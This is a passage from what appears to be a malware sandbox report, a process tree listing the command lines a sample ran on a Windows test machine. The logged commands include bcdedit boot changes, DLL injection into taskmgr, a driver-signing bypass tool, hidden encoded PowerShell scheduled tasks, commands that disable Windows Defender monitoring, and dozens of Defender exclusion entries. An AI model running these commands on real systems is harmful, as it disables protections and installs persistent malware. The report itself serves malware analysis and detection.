        Modifies boot configuration data using bcdedit
        
        PID:1220
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2380
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1164
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1232
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1504
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1508
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:332
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2276
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:1776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:816
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
      - C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        6⤵
        Executes dropped EXE
        
        PID:784
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn "csrss" /f
        7⤵
        
        PID:2376
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn "ScheduledUpdate" /f
        7⤵
        
        PID:1444
- - C:\Users\Admin\Pictures\Wa7OnNbYsdrgMnxTs5wzD67g.exe
    "C:\Users\Admin\Pictures\Wa7OnNbYsdrgMnxTs5wzD67g.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\7zS6D44.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:592
    - - C:\Users\Admin\AppData\Local\Temp\7zS710B.tmp\Install.exe
        
        .\Install.exe /lDdidiPnk "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        
        PID:2568
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:1572
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:2344
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:1916
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:1020
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:2376
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2288
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gdTQPSDcl" /SC once /ST 00:29:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:344
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gdTQPSDcl"
        6⤵
        
        PID:2140
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gdTQPSDcl"
        6⤵
        
        PID:1084
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 01:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\oRWrcBi.exe\" rd /SJsite_idfHu 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1616
- - C:\Users\Admin\Pictures\yfc4vidBW2iBp2WqetzvShC5.exe
    "C:\Users\Admin\Pictures\yfc4vidBW2iBp2WqetzvShC5.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1468
- - C:\Users\Admin\Pictures\F4yBUpCJKyC2y0Q5QOq9UNhz.exe
    "C:\Users\Admin\Pictures\F4yBUpCJKyC2y0Q5QOq9UNhz.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1256

C:\Windows\system32\taskeng.exe
taskeng.exe {E4ECD6AE-E414-4C6F-A87E-F800701092B2} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]
1⤵
PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2624
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1860
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:824

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231122015644.log C:\Windows\Logs\CBS\CbsPersist_20231122015644.cab
1⤵
- Drops file in Windows directory
PID:2580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "41898606116534421851578644653-325642080-220968784539796962513279219-874657683"
1⤵
PID:1912

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2936

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3004

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2716

C:\Windows\system32\taskeng.exe
taskeng.exe {F19F23D5-74A0-4C22-B89E-D4849827C3EA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2556
- C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\oRWrcBi.exe
  C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\oRWrcBi.exe rd /SJsite_idfHu 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gbfbQorFy" /SC once /ST 00:31:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gbfbQorFy"
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gbfbQorFy"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1932
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:268
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2612
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1508
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gcwOsQELv" /SC once /ST 00:18:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gcwOsQELv"
    3⤵
    PID:332
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gcwOsQELv"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2704
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2860
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\VeitDxgWDfCRoOtN\EyAYtKUo\XViDEHPdOrunVGpj.wsf"
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\VeitDxgWDfCRoOtN\EyAYtKUo\XViDEHPdOrunVGpj.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2688
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3048
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1348
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1756
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\aFeOAQnlubilNTVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\aFeOAQnlubilNTVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1544
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2388
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1088
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2308
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1752
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2108
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2404
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2144
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:240
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\aFeOAQnlubilNTVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2652
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\aFeOAQnlubilNTVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2648
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1352
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2744
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VeitDxgWDfCRoOtN" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:612
  - - C:\Windows\SysWOW64\reg.exe
